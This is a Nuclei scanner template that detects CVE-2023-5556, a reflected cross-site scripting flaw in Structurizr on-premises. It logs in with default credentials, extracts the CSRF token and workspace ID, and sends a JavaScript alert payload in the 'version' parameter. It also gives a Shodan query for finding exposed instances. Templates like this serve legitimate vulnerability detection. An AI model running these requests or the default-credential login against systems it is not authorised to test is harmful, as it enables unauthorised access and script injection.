id: CVE-2023-5556

info:
  name: Structurizr on-premises - Cross Site Scripting
  author: shankaracharya
  severity: medium
  description: |
    Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.
  remediation: |
    Apply the latest security patches or updates provided by Structurizr to fix the XSS vulnerability.
  reference:
    - https://huntr.com/bounties/a3ee0f98-6898-41ae-b1bd-242a03a73d1b/
    - https://github.com/structurizr/onpremises/commit/6cff4f792b010dfb1ff6a0b4ae1c6e398f8f8a18
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-5556
    cwe-id: CWE-79
    epss-score: 0.0007
    epss-percentile: 0.28947
    cpe: cpe:2.3:a:structurizr:on-premises_installation:*:*:*:*:*:*:*:*
  metadata:
    max-request: 5
    vendor: structurizr
    product: on-premises_installation
    shodan-query: http.favicon.hash:1199592666
  tags: cve,cve2023,xss,structurizr,oos,authenticated

variables:
  str: "{{randstr}}"

http:
  - raw:
      - |
        GET /signin HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&_csrf={{csrf}}&hash=

      - |
        GET /dashboard HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      - |
        GET /workspace/create HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /workspace/{{workspace}}/?version={{str}}%22);alert(document.domain);// HTTP/1.1
        Host: {{Hostname}}

    attack: pitchfork
    payloads:
      username:
        - "structurizr"
      password:
        - "password"

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '<a href="/dashboard">'
          - 'Sign out'
        condition: and

      - type: word
        part: body_5
        words:
          - '");alert(document.domain);//'
          - 'Structurizr'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="_csrf" value="([0-9a-z-]+)"'
        internal: true

      - type: regex
        name: workspace
        group: 1
        part: header
        regex:
          - '\/workspace\/([0-9]+)\?scriptNonce='
        internal: true
# digest: 490a004630440220271c92d7995694dbe343d56009d8854bb38cae92331641f43099d08c003ce1cb02200779d2024d6bac6fc0fe22f537d3122d655cfee23bea08577bba47ee95653215:922c64590222798bb761d5b6d8e72950